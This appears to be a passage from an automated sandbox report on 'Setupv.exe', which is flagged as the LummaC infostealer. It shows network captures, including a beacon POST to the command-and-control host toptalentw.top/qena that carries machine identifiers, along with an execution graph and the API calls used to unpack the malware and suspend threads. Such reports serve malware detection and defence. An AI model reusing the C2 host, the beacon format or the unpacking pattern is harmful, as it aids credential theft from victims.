                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: 3b dc ec a0 ec ca ff 69 57 56 0a 6f 50 81 ce b4 8d 33 56 ad 1b c1 92 2e 57 ca 3e 90 c7 3b 9d c1 66 56 c6 5d 23 42 54 f6 59 14 92 f7 2e 8f db 30 d1 25 1e e0 ad 53 8e 7b a7 b5 4a a3 0d eb 7e b6 76 5e 26 bd d2 13 07 55 f5 a4 48 f0 1c f9 4c 84 a6 53 a2 df ac 94 61 13 c6 76 ed 74 32 a6 a0 3e b4 e1 af 21 21 d4 73 da e6 04 bf a8 44 b4 f8 49 16 24 71 42 29 16 db 1b 68 a5 c2 4a bb 25 a8 dd 89 22 2b 36 89 bf c2 05 92 ce 79 0b 14 49 0e 1b 3f 84 3d bc 6b 66 fd e8 7e 3f 32 b3 f6 fe eb a5 7b e4 72 54 aa 1d 41 c7 3e 7a 12 12 70 94 8b b0 c0 ab fc f2 1e 77 ff f7 09 6d 9c 48 f8 16 8c 6d 2a 61 43 c9 cb d6 7d 1d 2a ac 32 be de a3 65 e0 98 92 13 6b 60 a9 e1 d0 d6 d4 c7 3d f1 a7 fe ca bf 7a a9 e3 b8 62 8a 99 0e c6 09 92 4d 5c a1 e7 d7 d0 c5 47 58 63 64 08 7f c0 4d 4b 99 12 32
                                                                                                                                                                                                                          Data Ascii: ;iWVoP3V.W>;fV]#BTY.0%S{J~v^&UHLSavt2>!!sDI$qB)hJ%"+6yI?=kf~?2{rTA>zpwmHm*aC}*2ek`=zbM\GXcdMK2
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: f9 98 e1 b1 25 ef cc 95 1c d0 cb 9d 14 84 ca da f5 15 fe 44 e6 fc 04 01 1a 3c a2 10 be 79 77 db ed dd aa b9 4b 50 6f 28 f6 09 40 4a b5 e9 d2 b3 54 95 53 33 4c a2 12 7d de 46 90 68 82 66 bd 20 9c c6 de 1c da 2b 48 21 6b c6 2f 22 d7 e3 b1 73 2f 51 c1 6a b7 de 80 37 c7 d4 34 a7 87 8e 8d fe ae 68 b9 47 b8 eb 01 86 0f 28 63 86 71 89 8d 38 d2 df e2 28 ea ac 5c 1a 30 e6 af 47 d7 ae 21 39 13 8e f2 75 5d 60 d0 78 3d 49 20 3e f3 ba d9 91 30 a5 13 0c d4 c0 64 23 0e d5 ef 79 3a 95 f0 36 73 9d 3a fc 70 ae ea e1 32 0b 2e 34 1f 72 ab df 3c d0 cb 9f b0 b8 da 6c 65 bf 55 72 34 cc 5a 08 4c df 55 e3 b7 9c 34 1e 3e 8b d7 a3 9e 38 87 ae 9f a0 a3 18 3e 13 eb 41 0a 20 cb 6e c7 87 51 95 85 2c c4 53 d3 bb 89 f9 b8 91 0e 09 e0 13 8c f3 ca b5 40 e9 35 82 ee ba c5 82 87 86 12 ef 4c
                                                                                                                                                                                                                          Data Ascii: %D<ywKPo(@JTS3L}Fhf +H!k/"s/Qj74hG(cq8(\0G!9u]`x=I >0d#y:6s:p2.4r<leUr4ZLU4>8>A nQ,S@5L
                                                                                                                                                                                                                          2025-04-28 17:35:01 UTC1460OUTData Raw: b1 5c 22 1f aa ad 25 fc f8 4b 7f 07 c0 1a e6 14 19 31 3c a9 53 48 04 c2 81 ac 92 e5 6d 45 ce d9 be e9 fd 6c 13 7e 2c ee 97 ac fb e4 f2 64 e4 a3 d8 12 ba 68 86 5d ea ca ed f2 cd 3f 57 7b f8 46 d6 79 f8 b9 9b dd ee ee f5 60 87 1c 3c d8 8b 8f a6 28 7f 51 0d e2 a5 36 bc 35 2d 8c 01 91 01 4b 73 5a 17 0f 38 08 c6 0a 2e b7 50 71 59 e8 2e 7a 74 55 25 2d b5 e5 4c 21 af b5 59 84 eb 73 63 60 5b 09 3b 64 db a9 46 50 70 2f d4 32 b4 4a 66 f4 8b 35 43 e0 c4 b1 4e ba 0d f5 41 4b 35 fb 4a c1 b3 44 06 5c d4 ad 8c ce d6 34 ec d9 51 ed 57 60 c3 dc ce 46 c3 3c 95 69 c4 b6 b9 dd 18 c2 68 86 46 0e f1 8a 2b 52 ff 5d da 75 cb 6a 20 bf 58 36 ba c9 5c e5 bc 4c 3f 6b ff f0 8f 45 37 52 d9 28 57 5f 31 ed f1 c8 fd ba f6 b8 97 20 ac 7b f7 7a 87 33 06 87 08 08 70 b1 c0 88 7d 6b d4 1e df
                                                                                                                                                                                                                          Data Ascii: \"%K1<SHmEl~,dh]?W{Fy`<(Q65-KsZ8.PqY.ztU%-L!Ysc`[;dFPp/2Jf5CNAK5JD\4QW`F<ihF+R]uj X6\L?kE7R(W_1 {z3p}k
                                                                                                                                                                                                                          2025-04-28 17:35:03 UTC289INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:35:03 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 93785051d84a463b-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          Content-Length: 70


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.549704104.21.36.1334437840C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-04-28 17:35:04 UTC263OUTPOST /qena HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 95
                                                                                                                                                                                                                          Host: toptalentw.top
                                                                                                                                                                                                                          2025-04-28 17:35:04 UTC95OUTData Raw: 75 69 64 3d 39 62 33 62 65 64 62 36 35 33 66 39 33 36 62 65 34 38 65 35 65 39 65 35 61 66 66 39 35 32 34 65 34 62 63 66 66 33 61 39 33 36 38 66 62 36 30 63 26 63 69 64 3d 26 68 77 69 64 3d 45 32 30 44 37 34 42 30 33 41 43 30 46 43 32 42 30 39 30 41 30 44 39 38 44 44 30 30 37 32 35 43
                                                                                                                                                                                                                          Data Ascii: uid=9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c&cid=&hwid=E20D74B03AC0FC2B090A0D98DD00725C
                                                                                                                                                                                                                          2025-04-28 17:35:04 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Mon, 28 Apr 2025 17:35:04 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                          CF-RAY: 93785063eeab4689-DFW
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2025-04-28 17:35:04 UTC43INData Raw: 65 ea be 9d 74 23 0a 17 e8 17 30 b4 1a ae fb 6c 39 b3 e2 82 15 5d 69 e1 80 25 dc 2c 2a dc df f7 db 82 6e 89 20 48 5e db c2 02 b1
                                                                                                                                                                                                                          Data Ascii: et#0l9]i%,*n H^


                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                          02040s020406080100

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                          02040s0.00102030MB

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                          • File
                                                                                                                                                                                                                          • Registry

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:13:34:14
                                                                                                                                                                                                                          Start date:28/04/2025
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\Setupv.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Setupv.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:5'298'048 bytes
                                                                                                                                                                                                                          MD5 hash:A88651093C94D9006DA8CCBC80535E29
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          File Activities

                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          Section Activities

                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          Registry Activities

                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          COM Activities

                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          Thread Activities

                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          Memory Activities

                                                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                                                          System Activities

                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage

                                                                                                                                                                                                                          Dynamic/Packed Code Coverage

                                                                                                                                                                                                                          Signature Coverage

                                                                                                                                                                                                                          Execution Coverage:16.7%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:98.9%
                                                                                                                                                                                                                          Signature Coverage:55.3%
                                                                                                                                                                                                                          Total number of Nodes:94
                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                          Show Legend
                                                                                                                                                                                                                          Hide Nodes/Edges
                                                                                                                                                                                                                          execution_graph 1439 2730000 1440 27300e9 1439->1440 1441 2730e59 GetPEB 1440->1441 1444 273066a 1441->1444 1442 2730aa2 1443 27306af GetPEB 1445 273072c 1443->1445 1444->1442 1444->1443 1446 2730c19 4 API calls 1445->1446 1447 273075f 1446->1447 1448 273078d CreateThread 1447->1448 1450 2730765 1447->1450 1448->1450 1455 2730ac9 2 API calls 1448->1455 1449 273099d 1452 2730a8d TerminateProcess 1449->1452 1450->1449 1451 2731119 GetPEB 1450->1451 1453 27307e7 1451->1453 1452->1442 1453->1449 1454 2730c19 4 API calls 1453->1454 1454->1449 1343 2730509 1344 2730517 1343->1344 1359 2730e59 1344->1359 1346 2730aa2 1347 27306af GetPEB 1349 273072c 1347->1349 1348 273066a 1348->1346 1348->1347 1362 2730c19 1349->1362 1352 273078d CreateThread 1353 2730765 1352->1353 1374 2730ac9 GetPEB 1352->1374 1358 273099d 1353->1358 1370 2731119 GetPEB 1353->1370 1355 2730a8d TerminateProcess 1355->1346 1356 2730c19 4 API calls 1356->1358 1358->1355 1372 2730e79 GetPEB 1359->1372 1361 2730e66 1361->1348 1363 2730c2f CreateToolhelp32Snapshot 1362->1363 1365 273075f 1363->1365 1366 2730c66 Thread32First 1363->1366 1365->1352 1365->1353 1366->1365 1367 2730c8d 1366->1367 1367->1365 1368 2730cc4 Wow64SuspendThread 1367->1368 1369 2730cee CloseHandle 1367->1369 1368->1369 1369->1367 1371 27307e7 1370->1371 1371->1356 1371->1358 1373 2730e94 1372->1373 1373->1361 1375 2730b22 1374->1375 1376 2730b82 CreateThread 1375->1376 1377 2730bcf 1375->1377 1376->1375 1378 27312f9 1376->1378 1391 2731b07 GetPEB 1378->1391 1380 2731323 1381 27313ef 1380->1381 1393 2731b50 1380->1393 1384 2731b50 GetPEB 1385 2731367 1384->1385 1386 2731b50 GetPEB 1385->1386 1387 2731385 1386->1387 1388 2731b50 GetPEB 1387->1388 1389 27313a3 1388->1389 1399 27317db 1389->1399 1392 2731b1f 1391->1392 1392->1380 1394 2731b67 1393->1394 1395 2731349 1393->1395 1394->1395 1412 2731e35 1394->1412 1395->1384 1397 2731c86 1397->1395 1398 2731b50 GetPEB 1397->1398 1398->1395 1416 2731787 1399->1416 1401 273181d 1402 2731ae6 1401->1402 1419 2731f13 NtAllocateVirtualMemory 1401->1419 1402->1381 1404 273194e 1404->1402 1421 273165e 1404->1421 1406 27319f5 1406->1402 1425 2731fa4 NtProtectVirtualMemory 1406->1425 1408 2731a2d 1408->1402 1426 2731f66 NtFreeVirtualMemory 1408->1426 1410 2731a57 1427 2731f66 NtFreeVirtualMemory 1410->1427 1413 2731e6f 1412->1413 1414 2731b07 GetPEB 1413->1414 1415 2731e97 1414->1415 1415->1397 1417 2731f13 NtAllocateVirtualMemory 1416->1417 1418 27317b8 1417->1418 1418->1401 1420 2731f5f 1419->1420 1420->1404 1423 273168f 1421->1423 1424 27316cf 1423->1424 1428 27315ad 1423->1428 1424->1406 1425->1408 1426->1410 1427->1402 1429 27315d9 1428->1429 1430 2731e35 GetPEB 1429->1430 1431 2731638 1430->1431 1432 2731653 1431->1432 1433 2731b50 GetPEB 1431->1433 1432->1423 1433->1432 1434 2730e58 1435 2730e66 1434->1435 1436 2730e79 GetPEB 1434->1436 1436->1435 1437 2731118 GetPEB 1438 273113c 1437->1438

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: !@$,$E$F$F$F$G$G$G$H$H$H$H$I$I$I$I$K$K$a+<Z
                                                                                                                                                                                                                          • API String ID: 0-1468048446
                                                                                                                                                                                                                          • Opcode ID: c19805f07ddf6a16674ac02d184dcb877c2735e7894112116302a322f8dd43d1
                                                                                                                                                                                                                          • Instruction ID: 7c54e283cbfc14ba32c61038a88231efefff9bf4ab4391304356899ae70047c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c19805f07ddf6a16674ac02d184dcb877c2735e7894112116302a322f8dd43d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF32F17164C3908BD325CB38C4583AFBBE1ABC5314F499A2DE4DA87382D7B98845CB57
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(?,00000000,00000001,?,00000000), ref: 02E51262
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(A3EDA112), ref: 02E512FB
                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02E5133C
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(6BBB69C7), ref: 02E513F2
                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(83478153), ref: 02E514DC
                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 02E5155C
                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02E51849
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocString$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                          • String ID: <Fhc$^l/C$nl/C$xurs
                                                                                                                                                                                                                          • API String ID: 305737880-2558134549
                                                                                                                                                                                                                          • Opcode ID: 924bf221f7d489498083d621763cdbe2b7d3d603a612de6f71d87ec4cc0abc55
                                                                                                                                                                                                                          • Instruction ID: 709c8b9fe4ac97dc4fca55b574986356721ae8e7107271fe466cc57749178a03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924bf221f7d489498083d621763cdbe2b7d3d603a612de6f71d87ec4cc0abc55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F720376A583518BD324CF29C88175BBBE2EFC9314F148A2DE998CB391D774D805CB92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID: GFIH$GFIH$GFIH$GFIH$R}&$V}&$a+<Z$a+<Z$a+<Z$a+<Z$~+n%$qw$u{
                                                                                                                                                                                                                          • API String ID: 2994545307-1495026326
                                                                                                                                                                                                                          • Opcode ID: 1981083c2d60287bb9179f441deaf03ffd5240bc59426d198f1b9b4576744ffb
                                                                                                                                                                                                                          • Instruction ID: f1604e5b4db3b005be4600374a7c23d6e017c5432f2e32f7603caeab2b122d4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1981083c2d60287bb9179f441deaf03ffd5240bc59426d198f1b9b4576744ffb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEB213716983A08BE324CF29C85176BB7E2FFC5318F18E92CE5D697281D7759809CB42
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                          • String ID: ^$c3$ga$~q
                                                                                                                                                                                                                          • API String ID: 3861434553-3691076684
                                                                                                                                                                                                                          • Opcode ID: 23338515eef4d37744e9dac22441ce8179baa8f7d62a20284582e2d5a4287d80
                                                                                                                                                                                                                          • Instruction ID: 4675773b407be8aeefc6d40e1473cb94d7581f15f56e8f673671cfd7ef55dca6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23338515eef4d37744e9dac22441ce8179baa8f7d62a20284582e2d5a4287d80
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C1203B594D3A08FD335CF2584607ABBFE1AFC7704F089A6DD8DA4B241CB3549098B92
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: "$%$>$I$K$~
                                                                                                                                                                                                                          • API String ID: 0-1658047442
                                                                                                                                                                                                                          • Opcode ID: 3e22bb7bcd8e9aa47fe98b8d9dfbc2a520c1bea7a41a61f4007f66ae204ea096
                                                                                                                                                                                                                          • Instruction ID: 84e008a32ea1feefbeb0a3a6e568c0d6053bd1a8bb9649cc873f9d76f1ffa0b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e22bb7bcd8e9aa47fe98b8d9dfbc2a520c1bea7a41a61f4007f66ae204ea096
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A026E7194C7908FC328DF38C5913AEBBE1AF95314F45992EE8DAC7391DA788845CB42
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 5$E$Z
                                                                                                                                                                                                                          • API String ID: 0-2360667877
                                                                                                                                                                                                                          • Opcode ID: 1e92b9a4d51e715f02dfb213b6aa7335232b28630e84769a0df4d05c0d73a66e
                                                                                                                                                                                                                          • Instruction ID: b6751da12871d4bec5c93deb21959c7102be29470f7f85aa7ffeedcb9ce2e2e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e92b9a4d51e715f02dfb213b6aa7335232b28630e84769a0df4d05c0d73a66e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4D193B554D7618BC324AF38C4812AEBBE6AFD8314F05DE2DE8DA87381DB348545CB46

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0273075F,?,00000001,?,81EC8B55,000000FF), ref: 02730C57
                                                                                                                                                                                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 02730C83
                                                                                                                                                                                                                          • Wow64SuspendThread.KERNEL32(00000000), ref: 02730CD6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02730D00
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849706056-0
                                                                                                                                                                                                                          • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                          • Instruction ID: ee676daa9919ab09ee95e04dff29f1760e07e5d6266028d70fa5c7effecad52c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70410A71A00108AFDB18DFA9C891BADB7F6EF88300F10C168E6159B795DB35AE45CB94

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 027307AC
                                                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02730AA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                          • String ID: Q#
                                                                                                                                                                                                                          • API String ID: 1197810419-665244491
                                                                                                                                                                                                                          • Opcode ID: 20408b49deccceb8f3f2607aff62e658c62c3cff53805367a480f9a57cc2b03a
                                                                                                                                                                                                                          • Instruction ID: b658b58706a73f67995f8b64c53752e3ca7756e66d7c80f6ce585f1ac9b383b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20408b49deccceb8f3f2607aff62e658c62c3cff53805367a480f9a57cc2b03a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D312C0B0E00219DFDB15CF98D991BADBBB2FF48304F2482A9D515AB386C735AA41CF54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 02E1B7E4
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02E1B7EE
                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02E1B89E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$FolderPathProcessSpecialThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2640001496-0
                                                                                                                                                                                                                          • Opcode ID: 543370e9da35ec513a21613d55092b711b0c14ce2c3a8b74925d0fff6e2ef461
                                                                                                                                                                                                                          • Instruction ID: 64283d71102c3d0ea1eb7fa97b3fb281c9684e7bc5be00ef6e34edd4d267f74f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 543370e9da35ec513a21613d55092b711b0c14ce2c3a8b74925d0fff6e2ef461
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F91D477B847114FD308DE29CC9235AB6D7ABC8714F09D43DE889D7395EA38DC458A81
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000003.1850705292.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_2e11000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 8$toptalentw.top/qena$ac
                                                                                                                                                                                                                          • API String ID: 0-3223457869
                                                                                                                                                                                                                          • Opcode ID: 0fe3c5a6f2c3985ab65717ac39b716d01d7ed81a7cdc6c28a1ebaf85b5f63eca
                                                                                                                                                                                                                          • Instruction ID: 7682996425b3082ed021691117518c865d1a2a32a6dfc74faa8d84cfabcab80a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe3c5a6f2c3985ab65717ac39b716d01d7ed81a7cdc6c28a1ebaf85b5f63eca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B125672A983508FD314CF29D8556ABBBE2BBC1314F08D97DF8998B351DB708885CB52

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 84 2730ac9-2730b20 GetPEB 85 2730b2b-2730b2f 84->85 86 2730b35-2730b40 85->86 87 2730bcf-2730bd6 85->87 89 2730b46-2730b5d 86->89 90 2730bca 86->90 88 2730be1-2730be5 87->88 92 2730be7-2730bf4 88->92 93 2730bf6-2730bfd 88->93 94 2730b82-2730b9a CreateThread 89->94 95 2730b5f-2730b80 89->95 90->85 92->88 97 2730c06-2730c0b 93->97 98 2730bff-2730c01 93->98 99 2730b9e-2730ba6 94->99 95->99 98->97 99->90 101 2730ba8-2730bc5 99->101 101->90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02730B95
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1854155673.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2730000_Setupv.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                          • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                          • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
